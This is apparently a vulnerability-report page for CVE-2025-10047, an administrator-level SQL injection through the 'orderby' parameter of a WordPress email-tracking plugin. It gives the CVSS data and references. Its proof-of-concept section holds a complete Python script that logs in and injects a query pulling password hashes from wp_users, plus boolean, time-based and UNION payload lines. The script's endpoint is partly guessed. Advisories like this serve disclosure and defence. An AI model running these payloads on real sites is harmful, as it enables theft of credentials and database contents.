Security Vulnerability Report
CVE-2025-10047 CVSS 4.9 MEDIUM

CVE-2025-10047

Published: 2025-10-22 09:15:31
Last Modified: 2026-04-15 00:35:42

Description

The Email Tracker – Email Log, Email Open Tracking, Email Analytics & Email Management for WordPress Emails plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 5.3.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Email Tracker plugin < 5.3.15
WordPress Email Tracker plugin <= 5.3.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10047 - WordPress Email Tracker Plugin SQL Injection PoC
# Vulnerability: SQL Injection via 'orderby' parameter
# Affected: Email Tracker plugin <= 5.3.15
# Requirement: Authenticated Administrator access

import requests
import re

# Configuration
TARGET_URL = "http://target-wordpress-site.com"
ADMIN_USERNAME = "admin"
ADMIN_PASSWORD = "password"

# Step 1: Login to WordPress as Administrator
session = requests.Session()
login_url = f"{TARGET_URL}/wp-login.php"
login_data = {
    "log": ADMIN_USERNAME,
    "pwd": ADMIN_PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}

# Set test cookie
session.cookies.set("wordpress_test_cookie", "WP%20Cookie%20check")

response = session.post(login_url, data=login_data, allow_redirects=True)

if "wp-admin" in response.url:
    print("[+] Successfully logged in as Administrator")
else:
    print("[-] Login failed")
    exit(1)

# Step 2: Exploit SQL Injection via 'orderby' parameter
# The vulnerable endpoint is typically in the admin-ajax.php or plugin-specific page
# Crafting UNION-based SQL injection payload

# Example payload to extract admin password hash
# Using ORDER BY injection technique
sqli_payload = "id,(SELECT user_pass FROM wp_users WHERE ID=1)-- -"

# Alternative time-based or error-based payloads may also work

exploit_url = f"{TARGET_URL}/wp-admin/admin.php"
exploit_params = {
    "page": "email-tracker",  # Plugin admin page
    "orderby": sqli_payload,
    "order": "DESC"
}

print("[*] Sending SQLi payload via 'orderby' parameter...")
response = session.get(exploit_url, params=exploit_params)

# Step 3: Extract sensitive information from response
if response.status_code == 200:
    # Look for extracted data in the response
    # The injected query result may appear in the response body
    print("[+] Request successful, analyzing response...")

    # Search for password hash pattern (WordPress uses phpass)
    hash_pattern = r'\$P\$[A-Za-z0-9./]{31}'
    matches = re.findall(hash_pattern, response.text)

    if matches:
        print(f"[+] Extracted password hashes: {matches}")
    else:
        print("[*] No obvious hashes found, check response manually")
        print(response.text[:500])
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Note: The exact endpoint and parameters may vary based on plugin version
# Additional payload examples:
# - Boolean-based: orderby=id AND (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='\$'
# - Time-based: orderby=id AND SLEEP(5)
# - UNION-based: orderby=-1 UNION SELECT user_pass FROM wp_users-- -

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416646%40email-tracker&new=3416646%40email-tracker&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/ec4be524-a763-4f2b-8a1d-6189014b4d86?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10047", "sourceIdentifier": "[email protected]", "published": "2025-10-22T09:15:31.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Email Tracker – Email Log, Email Open Tracking, Email Analytics & Email Management for WordPress Emails plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 5.3.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416646%40email-tracker&new=3416646%40email-tracker&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ec4be524-a763-4f2b-8a1d-6189014b4d86?source=cve", "source": "[email protected]"}]}}